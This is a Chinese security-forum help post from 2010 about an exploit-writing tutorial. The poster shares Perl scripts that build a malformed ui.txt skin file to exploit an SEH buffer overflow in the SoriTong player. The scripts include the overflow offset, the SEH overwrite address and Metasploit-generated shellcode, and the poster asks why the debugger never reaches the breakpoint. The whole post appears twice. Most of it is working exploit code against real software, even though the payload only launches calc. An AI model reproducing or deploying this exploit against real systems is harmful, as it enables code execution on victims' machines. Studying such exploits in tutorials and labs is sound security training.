-
-
[旧帖] [求助]《exploit编写系列教程》中的测试实例问题 0.00雪花
-
发表于: 2010-12-15 19:10
-
在《exploit编写系列教程》的第三篇,基于SEH的exploit中,是以SoriTong软件为例,修改skin文件中的一个ui.txt。软件打开时会出现缓冲区溢出。当我使用Metasploit生产的payload时,调试会出现问题。使用windbg调试。
当shellcode全部用字母“B”时,能调试到seh的断点处 exploit生成文件如下:
my $junk="A"x584;
my $nextSEHoverwrite="\xCC\xCC\xCC\xCC";
my $SEHoverwrite=pack('V',0x02fdbf96);
my $shellcode="B"x343;
my $junk2="\x90"x1000;
open(myfile,">ui.txt");
print myfile $junk.$nextSEHoverwrite.$SEHoverwrite.$shellcode.$junk2;
调试结果如下:
当shellcode使用由mestasploit生成的,用来调用calc。badchar为\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e。
exploit生成文件如下:
my $junk="A"x584;
my $nextSEHoverwrite="\xeb\x06\x90\x90";
my $SEHoverwrite=pack('V',0x02fdbf96);
my $shellcode="\x41\x92\x44\x0e\x1e\x4e\xd6\x4c\x51\x47\x99\x1e\xf5\x52" .
"\x46\x44\x58\x06\x37\x90\x06\x9f\x4c\x53\x4a\x9b\x4e\x97" .
"\x57\x4c\x5e\x97\xf5\x5d\x4b\x96\x5b\x99\x44\x0e\x50\x4a" .
"\x43\x5f\x3f\x58\x45\xf8\x42\x5a\x5b\x4b\xfd\x55\x92\x51" .
"\x54\x40\x4c\x52\xf8\x49\x90\x50\x5f\x98\x5e\x50\x44\x4a" .
"\x52\x54\x41\x52\x3f\x45\x59\x56\x06\x49\x55\x5b\x51\x1e" .
"\xf9\x37\x49\x44\x96\x5f\x3f\x4f\xf5\x9f\x51\xf8\x4e\x5b" .
"\x57\x96\x99\x3f\x51\x96\xf5\x5f\x4c\x99\x5a\x58\x45\x96" .
"\x9b\x2f\x4d\xfd\x91\x92\x37\x52\xda\xdf\xb8\x4c\x58\xc7" .
"\xa9\x31\xc9\xb1\x32\xd9\x74\x24\xf4\x5d\x31\x45\x17\x03" .
"\x45\x17\x83\xa1\xa4\x25\x5c\xc5\xbd\x23\x9f\x35\x3e\x54" .
"\x29\xd0\x0f\x46\x4d\x91\x22\x56\x05\xf7\xce\x1d\x4b\xe3" .
"\x45\x53\x44\x04\xed\xde\xb2\x2b\xee\xee\x7a\xe7\x2c\x70" .
"\x07\xf5\x60\x52\x36\x36\x75\x93\x7f\x2a\x76\xc1\x28\x21" .
"\x25\xf6\x5d\x77\xf6\xf7\xb1\xfc\x46\x80\xb4\xc2\x33\x3a" .
"\xb6\x12\xeb\x31\xf0\x8a\x87\x1e\x21\xab\x44\x7d\x1d\xe2" .
"\xe1\xb6\xd5\xf5\x23\x87\x16\xc4\x0b\x44\x29\xe9\x81\x94" .
"\x6d\xcd\x79\xe3\x85\x2e\x07\xf4\x5d\x4d\xd3\x71\x40\xf5" .
"\x90\x22\xa0\x04\x74\xb4\x23\x0a\x31\xb2\x6c\x0e\xc4\x17" .
"\x07\x2a\x4d\x96\xc8\xbb\x15\xbd\xcc\xe0\xce\xdc\x55\x4c" .
"\xa0\xe1\x86\x28\x1d\x44\xcc\xda\x4a\xfe\x8f\xb0\x8d\x72" .
"\xaa\xfd\x8e\x8c\xb5\xad\xe6\xbd\x3e\x22\x70\x42\x95\x07" .
"\x80\xb3\x24\x9d\x15\x6a\xdd\xdc\x7b\x8d\x0b\x22\x82\x0e" .
"\xbe\xda\x71\x0e\xcb\xdf\x3e\x88\x27\xad\x2f\x7d\x48\x02" .
"\x4f\x54\x2b\xc5\xc3\x34\xac";
my $junk2="\x90"x1000;
open(myfile,">ui.txt");
print myfile $junk.$nextSEHoverwrite.$SEHoverwrite.$shellcode.$junk2;
#close(myfile);
调试结果如下:
一直debuggee is running,没法运行。
请问这是为什么?
当shellcode全部用字母“B”时,能调试到seh的断点处 exploit生成文件如下:
my $junk="A"x584;
my $nextSEHoverwrite="\xCC\xCC\xCC\xCC";
my $SEHoverwrite=pack('V',0x02fdbf96);
my $shellcode="B"x343;
my $junk2="\x90"x1000;
open(myfile,">ui.txt");
print myfile $junk.$nextSEHoverwrite.$SEHoverwrite.$shellcode.$junk2;
调试结果如下:
当shellcode使用由mestasploit生成的,用来调用calc。badchar为\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e。
exploit生成文件如下:
my $junk="A"x584;
my $nextSEHoverwrite="\xeb\x06\x90\x90";
my $SEHoverwrite=pack('V',0x02fdbf96);
my $shellcode="\x41\x92\x44\x0e\x1e\x4e\xd6\x4c\x51\x47\x99\x1e\xf5\x52" .
"\x46\x44\x58\x06\x37\x90\x06\x9f\x4c\x53\x4a\x9b\x4e\x97" .
"\x57\x4c\x5e\x97\xf5\x5d\x4b\x96\x5b\x99\x44\x0e\x50\x4a" .
"\x43\x5f\x3f\x58\x45\xf8\x42\x5a\x5b\x4b\xfd\x55\x92\x51" .
"\x54\x40\x4c\x52\xf8\x49\x90\x50\x5f\x98\x5e\x50\x44\x4a" .
"\x52\x54\x41\x52\x3f\x45\x59\x56\x06\x49\x55\x5b\x51\x1e" .
"\xf9\x37\x49\x44\x96\x5f\x3f\x4f\xf5\x9f\x51\xf8\x4e\x5b" .
"\x57\x96\x99\x3f\x51\x96\xf5\x5f\x4c\x99\x5a\x58\x45\x96" .
"\x9b\x2f\x4d\xfd\x91\x92\x37\x52\xda\xdf\xb8\x4c\x58\xc7" .
"\xa9\x31\xc9\xb1\x32\xd9\x74\x24\xf4\x5d\x31\x45\x17\x03" .
"\x45\x17\x83\xa1\xa4\x25\x5c\xc5\xbd\x23\x9f\x35\x3e\x54" .
"\x29\xd0\x0f\x46\x4d\x91\x22\x56\x05\xf7\xce\x1d\x4b\xe3" .
"\x45\x53\x44\x04\xed\xde\xb2\x2b\xee\xee\x7a\xe7\x2c\x70" .
"\x07\xf5\x60\x52\x36\x36\x75\x93\x7f\x2a\x76\xc1\x28\x21" .
"\x25\xf6\x5d\x77\xf6\xf7\xb1\xfc\x46\x80\xb4\xc2\x33\x3a" .
"\xb6\x12\xeb\x31\xf0\x8a\x87\x1e\x21\xab\x44\x7d\x1d\xe2" .
"\xe1\xb6\xd5\xf5\x23\x87\x16\xc4\x0b\x44\x29\xe9\x81\x94" .
"\x6d\xcd\x79\xe3\x85\x2e\x07\xf4\x5d\x4d\xd3\x71\x40\xf5" .
"\x90\x22\xa0\x04\x74\xb4\x23\x0a\x31\xb2\x6c\x0e\xc4\x17" .
"\x07\x2a\x4d\x96\xc8\xbb\x15\xbd\xcc\xe0\xce\xdc\x55\x4c" .
"\xa0\xe1\x86\x28\x1d\x44\xcc\xda\x4a\xfe\x8f\xb0\x8d\x72" .
"\xaa\xfd\x8e\x8c\xb5\xad\xe6\xbd\x3e\x22\x70\x42\x95\x07" .
"\x80\xb3\x24\x9d\x15\x6a\xdd\xdc\x7b\x8d\x0b\x22\x82\x0e" .
"\xbe\xda\x71\x0e\xcb\xdf\x3e\x88\x27\xad\x2f\x7d\x48\x02" .
"\x4f\x54\x2b\xc5\xc3\x34\xac";
my $junk2="\x90"x1000;
open(myfile,">ui.txt");
print myfile $junk.$nextSEHoverwrite.$SEHoverwrite.$shellcode.$junk2;
#close(myfile);
调试结果如下:
一直debuggee is running,没法运行。
请问这是为什么?
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
